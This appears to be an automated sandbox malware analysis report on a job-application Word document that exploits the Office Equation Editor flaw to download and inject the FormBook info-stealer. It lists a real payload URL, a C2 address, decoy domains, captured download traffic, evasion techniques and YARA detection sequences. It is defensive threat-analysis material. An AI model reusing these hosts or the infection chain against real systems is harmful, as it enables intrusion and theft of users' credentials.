Windows Analysis Report C.V_Job Request.doc

Overview

General Information

Sample Name:C.V_Job Request.doc
Analysis ID:510259
MD5:b5be29921304476377e096c60a3fb418
SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
Tags:doc

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 940 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • seasonhd72463.exe (PID: 1812 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
      • seasonhd72463.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2176 cmdline: /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.seasonhd72463.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.seasonhd72463.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.seasonhd72463.exe.400000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18849:$sqlite3step: 68 34 1C 7B E1
  • 0x1895c:$sqlite3step: 68 34 1C 7B E1
  • 0x18878:$sqlite3text: 68 38 2A 90 C5
  • 0x1899d:$sqlite3text: 68 38 2A 90 C5
  • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
5.0.seasonhd72463.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.seasonhd72463.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\seasonhd72463.exe, NewProcessName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, OriginalFileName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ProcessId: 1812

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: C.V_Job Request.doc; Virustotal: Detection: 50%
Yara detected FormBook
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://binatonezx.tk/seasonzx.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: binatonezx.tk; Virustotal: Detection: 15%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp; Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe; ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; ReversingLabs: Detection: 22%
Source: 5.0.seasonhd72463.exe.400000.9.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.seasonhd72463.exe.400000.5.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.seasonhd72463.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.seasonhd72463.exe.400000.7.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
Source: global traffic; DNS query: name: binatonezx.tk
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then jmp 005D1E35h
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop edi
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Domain query: www.lenovoidc.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.agentpathleurre.space/s18y/
Source: Joe Sandbox View; ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: Joe Sandbox View; IP Address: 2.56.59.211 2.56.59.211
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Wed, 27 Oct 2021 14:42:17 GMT
  Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
  Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT
  ETag: "80800-5cf50687391d8"
  Accept-Ranges: bytes
  Content-Length: 526336
  Vary: User-Agent
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic; HTTP traffic detected:
  GET /seasonzx.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: binatonezx.tk
  Connection: Keep-Alive
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmp; String found in binary or memory: http://go.microsoft.c
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.425477290.000000000031D000.00000004.00000020.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3
Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp; String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT2P&
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp_2P&
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmp; String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
Source: unknown; DNS traffic detected: queries for: binatonezx.tk
Source: global traffic; HTTP traffic detected:
  GET /seasonzx.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: binatonezx.tk
  Connection: Keep-Alive

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
